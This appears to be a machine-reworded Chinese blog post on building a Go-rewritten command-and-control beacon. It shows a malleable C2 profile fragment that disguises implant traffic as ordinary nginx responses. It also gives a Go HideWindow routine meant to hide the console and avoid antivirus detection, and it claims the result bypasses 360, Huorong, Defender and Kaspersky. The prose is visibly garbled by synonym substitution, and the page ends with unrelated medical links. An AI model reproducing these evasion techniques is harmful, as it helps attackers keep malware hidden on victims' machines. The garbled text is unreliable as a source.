源代码基于go重写的beacon

2024-01-11 通信

id { mask; netbiosu; prepend "user="; append "%%"; header "User"; } # post our output with no real changes output { mask; base64url; prepend "data="; append "%%"; print; } } # The server's response to our HTTP POST server { header "Server" "nginx/1.10.3 (Ubuntu)"; header "Content-Type" "application/octet-stream"; header "Connection" "keep-alive"; header "Vary" "Accept"; header "Pragma" "public"; header "Expires" "0"; header "Cache-Control" "must-revalidate, post-check=0, pre-check=0"; # this will just print an empty string, meh... output { mask; netbios; prepend "data="; append "%%"; print; } }}

程式码前即可配备缺乏的库里，go库里被回廊必须直接访问，即可配置中所国也就是说，或其他方式

0x03 预定义更改

任何Apache的免谋害新项目，时长一长更都会仍然免谋害，我们要想它免谋害的时长长一些，即可自己改一改预定义，编者在readme中所提到，windows程式码时替换成-ldflags “-H windowsgui -s -w”降低程序截面积并中止黑框，这个中止黑框的选项通常都会被谋害软捕获，我们这里改用预定义借助于中止黑框

12345678910func HideWindow() { console := w32.GetConsoleWindow() if console == 0 { return // no console attached } _, consoleProcID := w32.GetWindowThreadProcessId(console) if w32.GetCurrentProcessId() == consoleProcID { w32.ShowWindowAsync(console, w32.SW_HIDE) }}

替换成如下预定义，并在main中所子程序HideWindow()，然后程式码时不即可指明选项-H windowsgui，通读预定义后，还可以更改其他部分，可自由发挥

0x04 效果展示

360精锐部队（核晶）、360谋害毒、火绒、搜狐机器管家

Defender

卡巴斯基免费版

可让上线

。

腹泻吃什么药
肠炎宁颗粒对宝宝消化不良有帮助吗
眼疲劳用什么方法缓解最好
癫痫医院
急救护理

TAG：源代码

上一篇：深圳：围绕元混沌产业高质量发展积极推动应用场景开放

下一篇：十二黄道十二宫的嫉妒心排行榜，巨蟹座排名榜首，你的黄道十二宫呢